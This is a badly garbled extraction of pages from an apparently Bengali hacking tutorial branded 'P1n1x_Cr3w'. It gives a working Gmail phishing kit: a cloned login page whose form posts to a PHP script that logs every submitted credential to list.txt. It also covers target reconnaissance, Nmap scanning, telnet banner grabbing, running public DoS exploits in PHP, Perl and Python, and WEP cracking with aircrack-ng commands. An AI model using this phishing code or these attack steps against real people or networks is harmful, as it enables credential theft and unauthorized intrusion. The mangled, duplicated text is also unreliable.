O. �F +��' +���� �� ���� *� *��������� ��-� +��) ,��� ��� ��sPA +�)�� save ����।+,���
![Page 42: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/42.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
42
��� � ��� Mozilla Firefox ���� ����'।���� ���� �)���� http://www.gmail.com/ � +,�� �� ��� click File -> Save +�) as… ��� <CTR> + S &�� �"�� +�) save ���� ��।
w। save ���� �����)���� ������ ��� ServiceLogin.htm +��� index.htm �"����।index +"��� ���� � +�! , � +����� ����� ,��� � � +, +�)�� (��� +" ��� +��� ��#���� ���Nz ����� �।
|।����� ���� +����� �� &��� ���� ���� PHP ��� ���� ����।���& ���� ��#��� PHP ��� +,�� �� �� “Sign in” � ��� ���� ���� ���� +����� "login details" store
����।��� ��$��� ��) ��� +" �� &���� +�����N � ���& +"�� ���) ��Þ� �� copy paste ����।� � ��� ��- +, ��� �)���� ��-� +�)�� save ���' +� ��� save
![Page 43: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/43.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
43
����।���� ��� �"�� phish.php।��� +� ��� ��� � ������ text file ���� ���� ��� ��� "�* list.txt।
<?php<?php<?php<?php
Header(“Location: Header(“Location: Header(“Location: Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=httphttps://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=httphttps://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=httphttps://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 “); ult<mplcache=2 “); ult<mplcache=2 “); ult<mplcache=2 “);
$h$h$h$h���le = fopen(“list.txt”, “a”);le = fopen(“list.txt”, “a”);le = fopen(“list.txt”, “a”);le = fopen(“list.txt”, “a”);
/*�����$A��� “list.txt” “list.txt” “list.txt” “list.txt” /����� *��� ���� ��� ��� +N�� �������। +N�� � +����� �!)����� ��� ���*��NA....*/
Foreach($_GET as $variable => $value) {Foreach($_GET as $variable => $value) {Foreach($_GET as $variable => $value) {Foreach($_GET as $variable => $value) {
fwrite($hfwrite($hfwrite($hfwrite($h���le, $variable);le, $variable);le, $variable);le, $variable);
fwrite($hfwrite($hfwrite($hfwrite($h���le, “=”);le, “=”);le, “=”);le, “=”);
fwrite($hfwrite($hfwrite($hfwrite($h���le, $value);le, $value);le, $value);le, $value);
fwrite($hfwrite($hfwrite($hfwrite($h���le, “le, “le, “le, “\\\\rrrr\\\\n”);n”);n”);n”);
}}}}
/*�� ���. +����� �!)����� * ���*��NA ����।*/
Fwrite($hFwrite($hFwrite($hFwrite($h���le, “le, “le, “le, “\\\\rrrr\\\\n”);n”);n”);n”);
/*��� +����� ��-� �N��� “list.txt” “list.txt” “list.txt” “list.txt” /���� ��� ।
FFFFclclclclosososose($he($he($he($h���le); le); le); le);
/*/*/*/*��� “list.txt” “list.txt” “list.txt” “list.txt” ������ connection connection connection connection ���H%���।*/
exit;exit;exit;exit;
?>?>?>?> ////////��� PHP program. PHP program. PHP program. PHP program. ������Á���।
![Page 44: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/44.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
44
�� �� ���&� +/���� £��� +" �� ����।
~. � ������� ��� PHP ��� * ��� �)���� +�)�� ���"�� ���� ��।��� �)������ +�����N �"�� *��� ���� ��।
�.<CTR> + F &����, ��� Edit-> Find , action ��� “Find Next”� &�� "�*।
�.�� �� !���� �&��� �� +" �� �����।
![Page 45: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/45.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
45
��� O�� “action” occurrences +" �� ����।+������ ��G��� +��' ���� �� “form id” ��� +"� ।action= �� �� “ “ �� ���. +, ��Ï��� +" � �� ��sPA��� ������� ��� phish.php �"�� ��।��� form ���� Google �� ������A +����� PHP phish ���� submit ����।���� �� ��
+� � ���� ��) +�� ���� ��� “post” ���� �����A� ��� “GET” ��� �"��।���� +" �� method=”GET” �� ���� ��।GET method �� ��) � �� �� +,�� �� URL �� ��#�� ���� ���� �� ��� submit ���� ,��� PHP ��� log ���� ����।
�.save ���� ��� /����� close ��� +/���।
�.���� ���� �� /��� +, free webhost £��� PHP support ��� ���� upload ���।
tÂ.����� ��D /��� �����N ��� �� +-��, +�����“list txt” /���� ��� � ����� �"�� ��।(�� +���� +������� ���� CHMOD ��� ��'।�� ����� ���A�&� ���� �� file permission ��“list.txt” 777 � �����A� ����।,�" ��.�� �� ����� ��$��� ���� �� ���� ��� ��!�� �)���� ���� +, ��- �� +�r ���� ����'।
tt. , � �� ��) +�E �� �� �� +����� +�r �� ��' +��� ��*�� *��������� ��ç � ,�* ��� +� ��� �� �� �)���� +��)� �� +�) ����।
�!)�����/���*��NA �� ��� Sign in ��� ����।��� +������ ��� �)���� +�) � redirect ����।
tO.� � �� �� +����� list.txt /����� +"� � http://www.yourwebhosturl.com/youraccount/list.txt
![Page 46: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/46.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
46
��� ��� ��¡ �� �� +������� ���"�* ��� ���� �����।� ��� �� �� +����� ��� �!)����� ��� ���*��NA ����।
(�������
�£��� +��� ���&�� �� �� ,� ���� ����� �� � -
Social Engineering-
�� �� �£�� +��� ���&�� Social Engineering � ��'� �#�� ���� ���� �����।Social Engineering � +�* +������ ��'� ���� +, +����� ����&� �� �� ���� ��'� (K ���� ����� ,��� �� �� ��.�� ����� +� +������ +#���� �"�� ���� ।
Shoulder Surfing-
, � �� �� ����&� ��� ����&� ,�� ������ +����� ���*��NA �� �� +�� + ��� �� �� +� +,� �� +" �� �� ��� ��� +����� ���*��NA
![Page 47: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/47.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
47
Guessing-
��� ��'� +����� ���*��NA�"�� �� ,� ��) Guess ��� ,�� ।���)� ���,����-�� �� ���,)¥ ���� ����" ।
Dictionary Attacks-
Dictionary attacks +��� ���&�� +����� !�&� �� ��� ��'� ���*��NA ����� +"*�� ,� Dictionary +� ��� �� ����� ��'�।
Brute-force attacks-
Brute-force attacks +��� ���&�� �� �� �^��� ��������� ���*��NA ���� ���� �����।
Phishing-
�/��� +��� ���&�� +����* ���� �� ���� ��� ��ç �� �"�� + ��� �� � !�&� ।
![Page 48: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/48.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
48
~~~~� � � � #�� #�� #�� #��
+��*���A ����
/� ��(���
/� ��(��� � +��� ���!��� ����� ��� +������� ���� �� ���।���� /� ��(��� �"��� ��#��P� ��) �� ��� ����।।���& +" ���� � ��$��� ���� ������ –
t. (��� ���� ��� ���-A� ��� *������� �� ��� �� ��)��।���� e-mails ��� names ��)��।���� ,�" �� �� +��� &�� +� +������� ����J social engineering attack * ���� ����।
O. ���� http://www.selfseo.com/find_ip_address_of_a_website.php ������ +��� ���-A� *��������� ���� ��Ï� ��x ����।URL �"��� +� ���� ��Ï��� ����।
w. *������� &��� ��' ���� �� �� )���� )� ���� Ping ���� ����।http://just-ping.com �� *������� +��� ���� ��� ���-A� *������� �� ��� ��� ���� ��Ï� �"�� ����। �� ������ �I���B'� w| �� ��� +��� ������ ping ��� ��� +�)�¤ +"�� ���Î� ���
![Page 49: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/49.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
49
|. http://whois.domaintools.com +��� ���� ��� ���-A� ��� *������� �� Whois ��)�� ।���� � �� +��� ���£��� ������।���� � ��� e-mails, address, names, when the domain was created, when the domain expires,the domain name server ����" �� ���� ।
~. search engines ���� ��� ���� *������� ����A ��� ��'� )���� ���� ।“site:www.the-target-site.com” �$��� + �)�� ��#�� ���� ������� ��£��� +�) +" �� ����� ,� Google � ��' ।specific word ���� ��� ���� ��* ��G� ��
![Page 50: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/50.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
50
+��� ���� +,�� “site:www.the-target-site.com email” �"�� ���� ���� �� ������ ��� ����� £��� ���� ।“inurl:robots.txt"�"�� ���� ���� �� robots.txt +�) �� ���� । ��� ��� � ��� ��� +-��� ��* +�� �� ��� ।
+���A C����
+���A C�� ��� �H ���� ��$A���� ��� +���A ���� ���।��)� ���� ����� ���-A� ��$A���� ��D ����� )���� �����, +� ���� vulnerabilities �� )� ������ ���� ���� ��� +����� *��������� ���«P xP ���� ���� ।+���A C�� ���� !"���P� )�� ���� +, ��A���F� )��(� +���A C���� ���� ���� �� � : http://nmap.org/download.html !"��P �� +" ���� �� Nmap GUI(Graphical User Interface) �� ����, ।��� Zenmap * ��� �।
t।(��� ���� ���� ���-A�/*������� ��'�� ���� ��� Target box � address �� �� �� ।�� �� +" �� ���� “���� +(�����” �� ���� ���� ���N� �H ।�� �� ,�" CLI $��A� � &���* ���� ���&� �&��� �� ����।
O. ���� ���� “Profile:” ����¼ ���� �$��� ��� ,�� C���� #�� ����¼ ����।���� ���� quick ��� quiet scan����¼ ����।Full version scan ���� +-�� ��� ��� ����� ��� )��� ���� #��P ��� ।���� �� ��� +��� ����� "s��
![Page 51: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/51.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
51
���� ���P ����*��� ��* !��� ���� ��� +" �।
w. /��/� �� ���� ���� ���� ।
|. �� �� +" �� ���� ��� +������ ��'� open ports +" ��� ,� ��) �����'।���& ���� ������� �� ��'� )��(� ports/services �� ��� +"� ......
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
![Page 52: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/52.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
52
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIos-ns
138 NetBIos-dgm
139 NetBIos
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIos over TCP)
1352 Lotus Notes
1433 Microsoft SQL server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
![Page 53: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/53.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
53
5800 VNC
5900 VNC
8080 HTTP
~. +��� +���A £��� ��) �����' �� )���� )�� ���� +� )���� �� +��� ������� �����(operating system)��) ���'। ��� £��� ������� ������ ��� vulnerabilities ��'।��� ���� ������� ����� ����A )���� ����� ��) ��$A��� (��� ���� �����।
�� �� Nmap �� ���� ������� ����� ����¼ ���� ��� ��', ��¡ ��� ���-A� ���� ,��� ���&���� ���' ���� ���. +,�� ���� +, +�* C���� ���'।��� �� ��� ���� �� ���� $��।�� +&�� +��� ��$A�� ��) �����' �� )���� )�� ���� �) !��� � 404 +�) ��) +�� ��� ।�� �� ��� +�) � +,�� ����� ,�� +��� �D¦� +��,!"��� ¬×� “www.targetsite.com/almadarifjanata.php” �� +�)�� �� ����� ������� +���,��� �� �� 404 +�) ���� ।+����$�- ��$A��� 404 +�) +" �� ������� ����� ������। ��� ���� ���� � +��� ���&�� custom 404 +�) +" ��,� � �� �J�� ��) ���� �� ।
�. ,�" �� �� CLI �� Nmap $��A� ���� ���� &�* � ��� ���� £��� +" �� �����। http://nmap.org/book/man.html
�.� � ���� �� open ports ��� +��� +��� ���$A� &��' �� +��� +-�'।��� � � ��$A�� �� $��A� ��) +�� ���� ��।� ���� “Banner Grabbing” ���) ���-।
![Page 54: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/54.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
54
����� x����
� � ������ ���' ���$A� �� ����� ��� ��' ,� ��$A�� � &����',� � ���� �)�� �� �� +��� �/�*��� ��� ��� $��A� ��!���� +(����� �� ���J� ��#�� ���� �� )���� ����।!�����) (Start -> Run -> “cmd” ��� -> Enter).
,�" �� �� Mac ���� ���� ���� �� �� terminal ���� ����' ।
*+��� =!����) Vista +� telnet �°�� ��� ���� ��।���&��) �J��� ����, �� �� �� ���� ����� -
*��ë�� ������ ,�*।
*Program and Features ����¼ ����।
*Turn !����) features on or off.
*Click the Telnet Client ��� ��� click OK.
*��/���A�� ���ì� ���� )� ���� ���� �z ����।+����� � � �°�� �� ,���।
t. (��� ���� nmap � ��*�� ���� open port +� �z���� ���� +&r� ����।#�� +�� +,,���� Target scan ���
![Page 55: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/55.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
55
Ot ����� +���A �� open +����' ।+��� �/���� �/�*��� &����' �� )���� )�� +� telnet www.targetsite.com 21 ���� Ø��� telnet ���� ����।�� �� '�� +� +" �� ��H ��� ���� ���!��� +� ���-A� ����' ��� (+��������) �"���'।�� �� (+��������) �� )��-�� +����� ���-A�/adress �� �"��।
O.���� ��� +����� ���-A� �� ���� Connect �� ��� +������ ���� banner +" ��� �/�*��� ��� �/�*����� $��A� �।
![Page 56: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/56.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
56
�/�*����� ��# vulnerabilities + ��)�� )� ������ �� ����� "����।,�" �$��� ��) �� ��� ���� Nmap �� full version detection ��� ���� ���� ��।
Vulnerability ���&A�
� � ���� �� ���' �/�*����� ��� ��� $��A� )��� ��' ��� +� �� �� ���� ��� ��£��� vulnerability +N����) �)�� �z���� ���� )��।,�" �z���� ��� ,�� ���� +� �� ��$A�� �� ���� ���� ��� ��$A�� " � ��� ����।,�" ���� �� ��� ���� +� � ������ open port +&r� ���� ।��£��� )��(� �z���� +N����) � =
*1337day
*SecurityFocus
*OSvdb
������ +���A + ��)�� �� ���� ,�" �/���� �/�*��� �� )�� +��� �z���� ���) �� ��� ���� ����£���* + �)�� �����।���� ������ ��� � �z���� ���� ���� ।����� ���� +"� $�E�� “0-day” ��� � ।
“0-day” vulnerabilities ���� +"� ���. ��'� ����P ��� £�¦�sPA ।
*+,��� vulnerabilities �� ����A +�! )��� �� ��� vulnerabilities ��� patch +�� ���� ��- ���� ���£��� ���� �� ���� ����।
*vulnerabilities �� ���� ��� "��� ���} ���� ���� ।
*��� � vulnerabilities +" ����� ��#�� ���� ��� )A� ���।
![Page 57: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/57.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
57
�� �� $����' “0-day” £��� ���� £�¦�sPA +��? +������ ���� equation �"�� ��.��...
Hacker + 0-Day + Company servers = Bad Reputation =Loss of Money
� ��� ���� ��'� ��� attacks ���� ����&�� ��� ,� vulnerabilities ��*��� �� ������ ��� ����।
Denial-of-Service (Dos)- ��� #��P� Dos attacks ��' ��¡ ��£���� !�í� ��� – Target server +� ��'� ��� �� )�� �� ���।+����$�- Dos attack � ���� Target server ������ ���£��� �� ��G�� ��$A�� �� F��� ������� ���� ���� ।,��� ���� ���� ���' �� /���� �� ,��।
Buffer Overflow (BoF)- +����� +(�x��� ����� N��� (��� ����� ���� BOF �� +" � ,��।+(�x��� N��� +�����)� )� ���"Ar ������ �� +"*�� ���� ���� Malicious code (��� ����� +(�x���� ��)� +$�î ��� /�� �� �� ��) ��� ��।Malicious Code �� ��z��!� �।Code �� ����� executed �� ���� ��$A�� " � ���� ����।,�" �� �� 1337day +� �z���� +N�����) + ��)� ���� �� �� ��'� �z���� ���� +����� �z���� ��� ������ �z���� �� ��।���& �PA�� +"*�� �
+����� �z���� - +����� �z���� &������� )� +����� (��� +����� ����� �#��� ����� ��।+����� �z���� ���� ��� � �N��� �� �� �#��� �I�J���� )��। �$��� ��� ,�� �� Ø��� +����� ������ �#��� �I�J +��� ���� ।
������ �z����- ������ �z���� �� +����� �z���� ���।�#� ������ �z���� ������� �� +,������ )��-� +��� ��� ,��।���� ������ ��� +����� �z���� ����� ���� ��� ��$A�� " � ���� )��।
![Page 58: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/58.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
58
+��������
� � �� �� $���'� ���� ��G� �z���� ��*��� �� +� �� ��$��� ���-A�� ���� ��� ��� ��$A�� " � ��� ?
��� � ��� �PA�� ��� � - 1337day +� + ��) ��� +" �� ����� ��� � +��� �z���� +N����) *�������� ,� � ��� +"*�� ���'।���& ��'� £�y�sPA +(�x���� $�E�� �z������ �PA�� +"*�� � -
PHP
PHP +��N ��� ���।����&�� +��N ��#��P� �� �<?php �"�� ��� +�E � ?>�"�� ।#�� +��, ���� �/���� ��$A�� 0.9.20. ��$A�� � ��'�F�P� )�� F�� ���� &��।,�" +� 1337day +� ��)� ��) ���� !"���¬×� ��� �� Dos �� ���� ��� - http://www.1337day.com/exploits/6238
���& #�� £��� +"*�� � -
t. (��� ����� ���� ���!���� ����&�� �°�� ���� ��।WAMP � ±B *��� ��$A�� ,��� ����&�� ��'।Mac �� )� ��' MAMP। ��� +��N �� +������N ��� �� “exploit.php” ���� save ���।����&�� ���� #���� ����� ��)�� �) ��।+��N�� �)�� +" �� $address = gethostbyname('192.168.1.3'); ���� ��' � ��� +������ ' '�� �$��� ���-A� �� ���� ��Ï� ����� ��।(����
![Page 59: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/59.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
59
�z����� ���"� ���"� �� ����।/�� +������ ���"�� ���� )�� * ��'� ���"A���� )�� +(�x���� )���� ��।�� ���"�� ��� /����� PHP executable /��� ��� ���� ��� directory +� save ����।WAMP � ��Ï��� �� C:\wamp\bin\php\php5.2.5 � ��� PHP �� $��A� ���'�* �� ����।
O. ���� ���� ���� +(����� &��� ��� ��� CD (change directory) ���� ���� ��� PHP directory +� ,��।
w.� � �z������ ��� ����� ��।�� )� “php exploit.php” ������ ��� �#���� ���� &���� ��।
|. ���� ������ �z���� ���� ���� ��'� ��^�� +��N �� ���� +"� ,��� ������N�� �A�² ,��� +��� +(�x���� )��� �� ���� ��� ���� ���� �� �����।!��� ���� ��#��P !"��P +" ���� ���'।�� �� �z���� �� t� ����� ���� ���� -
$junk.=”../../../sun-tzu/../../../sun-tzu/../../../sun-tzu”;
�� ���� �� +"�� ���' ��� ���N�"� +���� �������� )��।�� ���� ����$ �����
![Page 60: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/60.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
60
�� $������ ��। �A�² +(�x���� ���� +����� #���� ����� ��।
�#���� ��* $�� �� �� +��� �����।�£�� ��$A�� configurations �� )��।��)� ���� ����� +������ ���) ���) ��� �� �� ��।��� ��� ����� ���� ���� (K ���� +��� $�� +" ��� ��।��� �� �� £-�� ��)��,www.google.com � +����� ���।�� � ��� ��'� �� +��� community forums � �)��� ���� �����।
~. $��£��� �G� ���� �� ���-A� � Dos attack ��) ���� ��� �� ���� ��- ���� �- �,A &���� ����� ।,�" ��$A�� �� Dos attack �� ����P F��xD � ���� �� �� ���-A� ���� � �-�� +����� ��) �� /��/� +" �� �����।�� /�� ��$A�� N�!� �� ��� +�) +��N �� ��� ��� ��-��।
![Page 61: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/61.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
61
Perl
Perl ��� &������ �� ����&�� &������ ��� ���
t. ActivePerl �� ���� $��A��� N�!����N ��� �°�� ����।
O.���� ���� vulnerability �� )�� �z���� ��)��।� ��� ���� http://www.1337day.com/exploits/6613 ������� Win �/���� ��$A�� 2.3.0. ���� ���।��� ���� Denial of Service (Dos) �z����।
w. ���-A� ��$A�� �� �� ���� ��'� ,��-�� ���� �z������ ��N� ���।����AB�� ���� /��� �� “exploit.pl” ���� save ���।Pearl �z���� £��� “!/usr/bin/perl” �"�� �� � ।
|.� � ���� CMD Open ��� CD (change directory) ���� +(����� ���� ��� directory �����A� ���।���� “perl exploit.pl”���� ��� �z������ �� ���।DOS attack �� �� +-�... �) �� !!
Python
Python * ��� ���� programming language �z���� ���� ���� )��।http://www.python.org/downloads +��� �� �� Python N�!����N ��� ����
�����।Python &������ Perl �� ���।Python �� ��� �z���� ��*�� ,��� 1337day +�।��� �� �� +, Perl � +, ��� �� �� “exploit.pl” ���� �z������ +�$ ����'�� +� ���
�� �� ��� �"�� “exploit.py”। “.py” � Python �� �z�����।
![Page 62: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/62.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
62
����� #��� #��� #��� #��
*������ ����
� ��� ���� Wireless ���� ���� ����&�� ���।��� +" ���� ��$��� secure wireless\networks � +���� ,��।
*������ +��*���A ������
�� ���)� )�� +����� wireless card/adapter ��-��।���� +����� ������� wireless networks ��)��।
!�����)� )�� ���� +,�� ���� ��� �� � NetStumbler।�� Mac �� )�� MacStumbler।���� ��* ��'� +(�x���� ��� � -
• !����) * �����z� )� Kismet।
• ����� )� kismac।
#����s�
t.Netstumbler N�!����N ��� �°�� ����।
O.&��� ���� ��� Wireless access points �� )� automatic scan �� ����।
w.scan +�E *��� �� wireless access points �� ��� +" �� ����।
![Page 63: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/63.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
63
|. ,�" �� �� +��� MAC address � ��� ���� �� �� ���� x�/ +" ��।,� +��� ���) �� $�� signal ।
![Page 64: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/64.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
64
~. �� �� +" �� NetStumbler ��� '�^�* �� ��'� +" ��।��� MAC address, Channel number, encryption type ��� bunch +" ��।�£�� ������ )�� £�¦�sPA।network cracking �� )�� ��� ��'� encryption � -
• WEP (Wired Equivalent Privacy) - WEP +� � � �� �����" ��� ,�� ��।���� �� ��) WEP key crack ���� ����।
•WAP(Wireless Application Protocol) – WAP � � ���� ���&�� secure wireless network।WEP �� �� ��� �) �� ��।brute-force ��� dictionary attack �� Ø��� WAP crack ���� �।���*��NA ��G� �� dictionary attack ��) ���� �� �� brute-force ���� ���� ,�- +��- ,���।
WEP }����
� ��� ���� �����z� ���� �N�{��!�� Backtrack ���� ���।BackTrack � ��- +���� ���£��� �/�*��� +"*�� ����।}���� �� ���� ��- ����"� ��'� �)��� "���� -
t. wireless adapter � ���� ���!���।
O. Backtrack N�!����N ���� ��� ���� Live CD ����*।Backtrack � ���� +,�� tools ���� ��� �� � -
• Kismet – ���� wireless network detector
• airodump –,� wireless router +��� packets capture ��� ।
• aireplay – ��� ARP requests +/��) ���।
![Page 65: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/65.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
65
• aircrack – ��� WEP key +N�}� ���।
�� ��� ,��......
t.bssid, essid ��� channel number � ���� (��� wireless access point ���) +�� ���।��� ���� )�� ���� terminal &��� ��� ��� kismet ��� kismet &��� ���।��� +����� ���' ��G� adapter �� &����, ������ ath0।Iwconfig ���� ��� �N$����� ��� ����।
O.����* ��'� ���� )� +����� wireless adapter +� monitor mode � ���� ��।Kismet ��� ���) ���)� ���।
w.Kismet � �� �� Y/N/0 ���� ।��� ���$% encryption �� )�� ��) ���।��$��� ���� access points ��)�
Y=WEP N=OPEN 0=OTHER(usually WAP).
|.access point ��*��� �� +,������ text document ���� ��� networks broadcast name (essid),mac address (bssid) ��� ���� channel number paste ����।�� �� +��� arrow keys ���� ��� access point ����¼ ���� ���<ENTER>&��।
![Page 66: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/66.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
66
~।���� ���� access point +��� airodump ���� ��� data ������� ���।���� ������ terminal �� ��� airodump-ng -c [channel#] -w [filename] --bssid [bssid] [device] ��� airodump &��� ����।!���� ����
Pahaira
+(������ airodump-ng +, channel � &��� � �� +����� access point �� -c �� ��� ,��।output ,�� –w �� ��� ।MAC address � �� ,�� --bssid �� �� ।���� +(������� device name �"�� +�E � ।
�. ��� � ������ terminal ���� ।���� ���� ��'� fake packets ���� ���� �F access point �� )�� ,��� data output �� -�� ���^ ।������ � -
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
���� +(����� Ø��� ���� airplay-ng program. ���� ��� ।-1 � fake authentication ,� access point. � ।
0 � attack �#��AB ���।
�.� � ���� �F access point � ������ ���£��� packets ��G����� ,��� WEP key }�� ���� ���� ।aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]�� ���� � -3 Ø��� attack�� type ��.�� ,� �� +F�� packet injection । -b � MAC address of the �F access point ।-h � wireless adapters MAC address । wireless adapter device �� ��� ���� ���� +��E ।
�. , � �� �� 50k-500k packets �� �� +��� ,��� �� �� WEP key +¯� ��� �� ���� ����� ।aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
![Page 67: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/67.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
67
�� ���� Ø��� ���� }���� �� �����।�� ���� � -a 1 �"�� program +� WEPattack mode, ���� � । -b � MAC address��� -n 128 � WEP key length ।n �� �� ��� �� )���� +�� "�* ।�$��� �� �� WEP key +� ��s��A� }�� ���� �����।
�$��� +��� $������ �� �� £-�� ��)�� �� �� ��� !y� ���� ।
pahaira 2
����� ���/�
